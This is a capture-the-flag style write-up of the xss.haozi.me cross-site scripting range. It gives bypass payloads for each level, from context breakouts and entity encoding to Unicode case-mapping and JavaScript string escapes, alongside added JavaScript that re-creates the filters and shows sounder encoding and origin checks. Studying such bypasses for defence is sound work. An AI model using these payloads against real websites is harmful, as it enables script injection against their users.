XSS range (II) xss.haozi
2022-07-29 02:33:00 【The tree lost its way】
Target address: https://xss.haozi.me
0x00
No filtering at all; the input is echoed straight into the page:
<script>alert(1)</script>
0x01
Inside a <textarea> everything is plain text, so a script placed there is never executed. Close the tag first, then inject:
</textarea><script>alert(1)</script>
0x02
The input lands inside a double-quoted attribute value. Close the quote and the tag, or close just the quote and add an event-handler attribute:
"><script>alert(1)</script>
aaa" onclick="alert(1) 
0x03
A regex strips ( and ). Call alert with a template literal instead, which needs no parentheses:
<script>alert`1`</script>
0x04
The regex now strips ( ) and ` as well. Write the parentheses as HTML character references instead. In an ordinary <script> element the parser never decodes references, but a <script> nested inside inline <svg> is foreign content, where the references are decoded before the script runs:
<svg><script>alert&#40;1&#41;</script>
0x05
The filter replaces --> (the input is placed inside an HTML comment). Browsers accept two ways of ending a comment: the standard --> and the non-standard --!>, which the parser treats as a recoverable error that still closes the comment. The filter only knows the first:
--!><script>alert(1)</script>
0x06
The regex replaces auto, on.*= and >, which blocks autofocus, every on...= event handler and closing the tag. It leaves newlines alone, and . in a JavaScript regex does not match a newline, so putting a line break between the handler name and the = defeats on.*=. HTML allows whitespace and newlines around the = of an attribute, so the handler still works. Each payload below spans two lines; the line break is part of it:
onclick
=alert(1)
onmousedown
=alert(1)
type=image src=1 onerror
=alert(1)
0x07
The regex <\/?[^>]+> matches a <, an optional /, one or more characters that are not >, and a closing >, case-insensitively: any complete tag, which it removes. A tag that is never closed does not match. The HTML parser is tolerant: an <svg or <img without its > is still parsed (the tag ends at whatever > comes next in the template), so leave the > off and end the attribute value with // or a newline:
<svg onload=alert(1)//
<svg onload=alert(1) followed by a newline
<img src=1 onerror="alert(1)"
0x08
The filter removes the literal </style>, so the style element cannot be closed the obvious way. As in 0x06 and 0x07, use the parser's tolerance: a tag name ends at whitespace, so </style followed by a space or a newline before the > still closes the element and no longer matches the filter:
</style ><script>alert(1)</script>
</style
><script>alert(1)</script>
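Added example, not code from the page or from xss.haozi.me: the four blacklist filters of 0x05 to 0x08, re-created in JavaScript from the descriptions above, with the page's payloads and the obvious payloads run through each, and the same payloads run through plain output encoding for comparison. The regexes, the assumed contexts (0x05 inside a comment, 0x06 inside a tag's attribute list, 0x07 in element content, 0x08 inside <style>) and the breakout checks are reconstructions; the site's real code may differ.

```javascript
'use strict';

// Blacklist filters as the page describes them (reconstructions, not the
// site's source).
const FILTERS = {
  '0x05': s => s.replace(/-->/g, ''),               // strips the comment close
  '0x06': s => s.replace(/auto|on.*=|>/gi, '_'),    // "auto", "on...=", ">"
  '0x07': s => s.replace(/<\/?[^>]+>/gi, ''),       // any complete tag
  '0x08': s => s.replace(/<\/style>/gi, ''),        // the literal </style>
};

// The fragment that must survive filtering for the page's breakout to work
// in the assumed context of each level.
const BREAKOUT = {
  '0x05': /--!?>/,                        // a comment close the parser accepts
  '0x06': /on[a-z]+\s*=\s*alert/i,        // an event-handler attribute
  '0x07': /<(svg|img)\b[^>]*on[a-z]+=/i,  // a tag (closed or not) with a handler
  '0x08': /<\/style[\s>]/i,               // a </style the parser accepts
};

const PAGE_PAYLOADS = {
  '0x05': '--!><script>alert(1)</script>',
  '0x06': 'onclick\n=alert(1)',
  '0x07': '<svg onload=alert(1)//',
  '0x08': '</style ><script>alert(1)</script>',
};

// The obvious payload each filter was written to catch.
const NAIVE_PAYLOADS = {
  '0x05': '--><script>alert(1)</script>',
  '0x06': 'onclick=alert(1)',
  '0x07': '<svg onload=alert(1)>',
  '0x08': '</style><script>alert(1)</script>',
};

// True when the breakout survives the level's blacklist filter.
function survives(level, payload) {
  return BREAKOUT[level].test(FILTERS[level](payload));
}

// Output encoding for HTML text and quoted attribute values. With < and >
// gone, no tag and no comment close can be formed from the input.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// True when the breakout survives encoding instead of the blacklist.
function survivesEncoding(level, payload) {
  return BREAKOUT[level].test(escapeHtml(payload));
}

// One row per level: does the page's payload beat the regex, does the regex
// at least catch the naive payload, and does encoding stop the page's payload.
function report() {
  return Object.keys(FILTERS).map(level => ({
    level,
    regexBypassed: survives(level, PAGE_PAYLOADS[level]),
    naiveCaught: !survives(level, NAIVE_PAYLOADS[level]),
    encodingBypassed: survivesEncoding(level, PAGE_PAYLOADS[level]),
  }));
}

console.table(report());
```

Run it with node. Every regex catches its naive payload and misses the page's one. 0x06 is the odd one out in the last column: escapeHtml does not touch onclick followed by a newline and =alert(1), because that sink drops the input straight into a tag's attribute list, where no encoding can help; the sink itself has to go. Adding the s (dotAll) flag to on.*= would close the newline gap, but not the problem with blacklisting.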
0x09
A regex requires the input to begin with https://www.segmentfault.com; the result is placed in the src="..." attribute of a <script> tag. Supply the prefix, close the quote and the tag with "></script>, open a new script, and use // to comment out the leftover "> from the template:
https://www.segmentfault.com1"></script><script>alert(1)//
0x0A
Same prefix check, and now ' " < > / are entity-encoded too, so the attribute cannot be closed. Use the URL's userinfo syntax instead: everything between :// and @ is the username (here www.segmentfault.com), and the real host is whatever follows the @, so the browser fetches the script from the attacker's host. Chrome blocks subresource requests that carry embedded credentials, so test this one in Firefox:
https://www.segmentfault.com@xss.haozi.me/j.js
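Added example, not from the page or the challenge: the prefix check that 0x09 and 0x0A describe, next to the way the browser actually parses the same string, using the WHATWG URL parser that Node ships. The candidate URLs and the host attacker.example are constructed for the example.

```javascript
'use strict';

// The check 0x09 and 0x0A describe: the string must start with the prefix.
const REQUIRED_PREFIX = 'https://www.segmentfault.com';

function prefixCheck(url) {
  return url.startsWith(REQUIRED_PREFIX);
}

// What the browser does with the same string: parse it. Text between "://"
// and "@" is userinfo; the host is what comes after the "@".
function parsed(url) {
  try {
    const u = new URL(url);
    return { username: u.username, host: u.host, origin: u.origin };
  } catch {
    return null;
  }
}

// A check that agrees with the browser: compare the parsed origin, not a prefix.
function originCheck(url) {
  const p = parsed(url);
  return p !== null && p.origin === REQUIRED_PREFIX;
}

// Constructed inputs; attacker.example stands in for any host the attacker controls.
const CANDIDATES = [
  'https://www.segmentfault.com/j.js',                   // genuine
  'https://www.segmentfault.com@attacker.example/j.js',  // the 0x0A trick: prefix becomes the username
  'https://www.segmentfault.com.attacker.example/j.js',  // prefix becomes a subdomain label
];

function evaluate(url) {
  const p = parsed(url);
  return { url, prefixCheck: prefixCheck(url), host: p && p.host, originCheck: originCheck(url) };
}

console.table(CANDIDATES.map(evaluate));
```

Run it with node. The prefix check passes all three candidates, while the parser resolves the second and third to attacker.example; comparing the parsed origin (or allow-listing hosts) is the check that matches what the browser will fetch. Chrome's refusal to load subresources with embedded credentials is a separate defence inside the browser, not in the check, which is why the page suggests Firefox.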
0x0B
All input is converted to uppercase. HTML tag and attribute names are case-insensitive, but JavaScript is not: ALERT is not a function. Put the call in an event handler and write alert as HTML character references; the digits survive the uppercasing, and the parser decodes the references when it reads the attribute value:
<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>
0x0C
Same as the previous level, plus the word script is stripped (case-insensitively). Either avoid the tag with svg, or write script twice so that removing the inner occurrence leaves a real <script> behind; alert is still entity-encoded because of the uppercasing:
<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>
<sscriptcript src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)></sscriptcript>
0x0D
The filter strips < / " ' and none of them are needed here. The input is placed inside a JavaScript single-line comment (// ...) in a script block, and the template leaves a ') after it. A newline ends the comment so that alert(1) runs as code; --> at the start of the following line is itself treated as a single-line comment by JavaScript (the Annex B HTML-like comment syntax), which hides the trailing '). The payload is a line break followed by these two lines:
alert(1)
-->
0x0E
The regex matches < followed by an ASCII letter ([a-zA-Z]), inserts _ after the < (so <svg becomes <_svg), and the result is uppercased; that breaks nearly every tag name. The trick is the long s, ſ (U+017F): it is not in [a-zA-Z], so the regex ignores it, but toUpperCase() maps it to a plain S, so <ſcript leaves the filter as <SCRIPT. As in 0x0B, alert has to be written as character references because of the uppercasing:
<ſcript src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)></script>
<ſvg onload=&#97;&#108;&#101;&#114;&#116;(1)>
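Added example, not code from the page or the challenge: the case-mapping filters of 0x0B, 0x0C and 0x0E re-created in JavaScript from the descriptions above (the site's exact code may differ), the page's payloads run through them, and, going beyond the single character the page uses, a scan for every character that, like ſ, is outside [a-zA-Z] but uppercases to ASCII letters. The tag-name and handler extraction is a deliberately small stand-in for the HTML parser.

```javascript
'use strict';

// The case-mapping filters as the page describes them (reconstructions,
// not the site's source).
const FILTERS = {
  '0x0B': s => s.toUpperCase(),
  '0x0C': s => s.replace(/script/gi, '').toUpperCase(),
  '0x0E': s => s.replace(/<([a-zA-Z])/g, '<_$1').toUpperCase(),
};

// "alert" as decimal character references: digits are not changed by
// toUpperCase(), and the HTML parser decodes them in attribute values.
const ALERT = '&#97;&#108;&#101;&#114;&#116;';

// The page's payloads; \u017F is the long s, ſ.
const PAYLOADS = {
  '0x0B': `<svg onload=${ALERT}(1)>`,
  '0x0C': `<sscriptcript src=1 onerror=${ALERT}(1)></sscriptcript>`,
  '0x0E': `<\u017Fcript src=1 onerror=${ALERT}(1)></script>`,
};

// Tag name as the HTML parser would see it (it lowercases ASCII itself).
function tagName(html) {
  const m = /^<([^\s>\/]+)/.exec(html);
  return m ? m[1].toLowerCase() : null;
}

// Value of the first on*= attribute with numeric character references
// decoded, i.e. the handler body the JavaScript engine would be handed.
function handlerBody(html) {
  const m = /\son[a-z]+=("[^"]*"|'[^']*'|[^\s>]*)/i.exec(html);
  if (!m) return null;
  const raw = m[1].replace(/^(["'])(.*)\1$/, '$2');
  return raw.replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(Number(d)));
}

// Run one level and report what the browser would get.
function run(level, payload = PAYLOADS[level]) {
  const out = FILTERS[level](payload);
  return { out, tag: tagName(out), handler: handlerBody(out) };
}

// Every non-ASCII BMP character whose toUpperCase() consists only of ASCII
// letters: each one slips past [a-zA-Z] and leaves the filter as a tag
// letter, which is the general form of the ſ trick.
function asciiUpperAliases() {
  const out = [];
  for (let cp = 0x80; cp <= 0xFFFF; cp++) {
    const ch = String.fromCodePoint(cp);
    const up = ch.toUpperCase();
    if (/^[A-Z]+$/.test(up)) {
      out.push({ char: ch, codePoint: 'U+' + cp.toString(16).toUpperCase().padStart(4, '0'), upper: up });
    }
  }
  return out;
}

for (const level of Object.keys(FILTERS)) console.log(level, run(level));
console.table(asciiUpperAliases());
```

Run it with node. Each of the page's payloads comes out with a usable tag name and a handler that decodes to alert(1), while a plain <svg onload=alert(1)> comes out of 0x0B with ALERT(1) and out of 0x0E as <_SVG. The scan lists the long s and the dotless i (ı, U+0131, which uppercases to I) plus a few ligatures such as ß and ﬁ; any of them can stand in for the letter it maps to.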
0x0F
As in 0x0A, & ' " < > / are replaced by HTML character references. But here the input lands inside a JavaScript string in an event-handler attribute (onerror="...('...')"). The HTML parser decodes character references in attribute values before the JavaScript engine ever sees the handler, so the encoding is undone by the time the code runs. Close the string and the call, then reopen them so the rest of the template still parses:
');alert(1);('
0x10
No filtering; the input becomes the contents of a single-quoted JavaScript string (the data value) in a script block. Close the string and the call, then reopen them:
');alert(1);('
0x11
Same setup as 0x0F, but now / ' " ` < > \ and newlines are backslash-escaped. The escaped text is placed inside a double-quoted string that itself sits inside a single-quoted JavaScript literal (a javascript: URL), and within single quotes \" is read as a plain ". So by the time the URL runs the double quotes are live again: close with ") and reopen with (", or comment out the rest with //:
Escaping / does nothing for JavaScript string syntax; in inline scripts its only job is to stop a literal </script> inside a string from ending the block, and < is already escaped here.
");alert(1);("
");alert(1);//
0x12
Only " is escaped (to \"). There is no need to fight the quote at all: < and > are untouched, so close the whole <script> element and open a new one, with // to comment out the leftover ") of the template. Alternatively defeat the escaping: send a backslash before the quote, so that the added backslash is itself escaped (\\") and the quote stays live, then close the string:
</script><script>alert(1)//
a\");alert(1);//
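Added example, not code from the page or the challenge: the three JavaScript-string sinks of 0x0F, 0x11 and 0x12 re-created from the descriptions above, with the page's payloads run through them and the text left after the string literal ends used as the breakout indicator, next to a correctly built literal. Assumed sinks: 0x0F puts the input in onerror="console.error('...')", 0x11 in 'javascript:console.log("...")' and 0x12 in console.log("..."); the site's real templates may differ, and the attribute decoder and single-quote unescaper are simplified stand-ins for the browser.

```javascript
'use strict';

// 0x0F's defence: HTML character references for & ' " < > /.
function entityEncode(s) {
  return s.replace(/[&'"<>\/]/g, c => `&#${c.charCodeAt(0)};`);
}

// What the HTML parser does to an attribute value before the JavaScript
// engine sees it: numeric references and the common named ones are decoded.
function decodeAttr(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, body) => {
    if (body[0] !== '#') return named[body.toLowerCase()] ?? m;
    const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
    return String.fromCodePoint(cp);
  });
}

// 0x11's defence: backslash-escape / ' " ` < > \ and newlines.
function backslashEscape(s) {
  return s.replace(/[\/'"`<>\\]/g, c => '\\' + c).replace(/\n/g, '\\n');
}

// The value of a single-quoted JavaScript literal whose source text is s
// (simplified: \n and "\c" -> "c" are all this example needs).
function singleQuotedValue(s) {
  return s.replace(/\\(.)/g, (_, c) => (c === 'n' ? '\n' : c));
}

// 0x12's defence: escape the double quote and nothing else.
function quoteEscape(s) {
  return s.replace(/"/g, '\\"');
}

// For JavaScript source that begins with a string literal, return the source
// after the literal. Anything other than ")" means the input broke out.
function afterStringLiteral(js) {
  const q = js[0];
  for (let i = 1; i < js.length; i++) {
    if (js[i] === '\\') { i++; continue; }   // escaped character: skip it
    if (js[i] === q) return js.slice(i + 1);
  }
  return null;  // unterminated literal
}

// The code each sink really executes, from the string literal onwards.
function level0F(input) {
  const attr = `console.error('${entityEncode(input)}')`;    // attribute as written
  return decodeAttr(attr).slice('console.error('.length);   // handler body as run
}
function level11(input) {
  const inner = `javascript:console.log("${backslashEscape(input)}")`;  // inside '...'
  return singleQuotedValue(inner).slice('javascript:console.log('.length);
}
function level12(input) {
  return `console.log("${quoteEscape(input)}")`.slice('console.log('.length);
}

// A correct literal: JSON.stringify escapes both \ and ", and < is escaped
// too so that </script> can never appear inside an inline script.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/</g, '\\u003c');
}
function level12Fixed(input) {
  return `console.log(${jsStringLiteral(input)})`.slice('console.log('.length);
}

// The page's payloads and what is left once the literal ends.
function breakouts() {
  const p0F = "');alert(1);('";
  const p11 = '");alert(1);("';
  const p12 = 'a\\");alert(1);//';
  return {
    '0x0F': afterStringLiteral(level0F(p0F)),
    '0x11': afterStringLiteral(level11(p11)),
    '0x12': afterStringLiteral(level12(p12)),
    '0x12 fixed': afterStringLiteral(level12Fixed(p12)),
    '0x12 script close': level12('</script><script>alert(1)//').includes('</script>'),
    '0x12 fixed, script close': level12Fixed('</script><script>alert(1)//').includes('</script>'),
  };
}

console.log(breakouts());
```

Run it with node. For the three levels the text after the literal starts with );alert(1), i.e. the payload is now code; for the fixed literal only the closing ) of the call remains, and </script> can no longer appear inside it. The design point is the same in all three cases: the escaping has to match the context that finally consumes the string (an attribute value is entity-decoded, a nested literal is unescaped once per layer), and a JavaScript string literal needs its backslashes escaped before its quotes.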
Done! Habits differ and the answers are not unique; if you found other solutions, feel free to share!